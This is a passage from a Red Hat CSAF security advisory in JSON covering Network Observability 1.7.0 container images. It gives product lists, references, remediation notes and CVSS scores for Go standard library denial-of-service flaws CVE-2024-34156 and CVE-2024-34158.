"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-34156"
},
{
"category": "external",
"summary": "RHBZ#2310528",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2310528"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-34156",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-34156"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-34156",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-34156"
},
{
"category": "external",
"summary": "https://go.dev/cl/611239",
"url": "https://go.dev/cl/611239"
},
{
"category": "external",
"summary": "https://go.dev/issue/69139",
"url": "https://go.dev/issue/69139"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-dev/c/S9POB9NCTdk",
"url": "https://groups.google.com/g/golang-dev/c/S9POB9NCTdk"
},
{
"category": "external",
"summary": "https://pkg.go.dev/vuln/GO-2024-3106",
"url": "https://pkg.go.dev/vuln/GO-2024-3106"
}
],
"release_date": "2024-09-06T21:15:12.020000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-22T01:05:39+00:00",
"details": "For details on how to apply this update, refer to: \n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:8014"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "encoding/gob: golang: Calling Decoder.Decode on a message which contains deeply nested structures can cause a panic due to stack exhaustion"
},
{
"cve": "CVE-2024-34158",
"cwe": {
"id": "CWE-1325",
"name": "Improperly Controlled Sequential Memory Allocation"
},
"discovery_date": "2024-09-06T21:20:12.126400+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2310529"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the go/build/constraint package of the Golang standard library. Calling Parse on a \"// +build\" build tag line with deeply nested expressions can cause a panic due to stack exhaustion.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "go/build/constraint: golang: Calling Parse on a \"// +build\" build tag line with deeply nested expressions can cause a panic due to stack exhaustion",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-34158"
},
{
"category": "external",
"summary": "RHBZ#2310529",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2310529"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-34158",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-34158"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-34158",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-34158"
},
{
"category": "external",
"summary": "https://go.dev/cl/611240",
"url": "https://go.dev/cl/611240"
},
{
"category": "external",
"summary": "https://go.dev/issue/69141",
"url": "https://go.dev/issue/69141"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-dev/c/S9POB9NCTdk",
"url": "https://groups.google.com/g/golang-dev/c/S9POB9NCTdk"
},
{
"category": "external",
"summary": "https://pkg.go.dev/vuln/GO-2024-3107",
"url": "https://pkg.go.dev/vuln/GO-2024-3107"
}
],
"release_date": "2024-09-06T21:15:12.083000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-22T01:05:39+00:00",
"details": "For details on how to apply this update, refer to: \n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x",
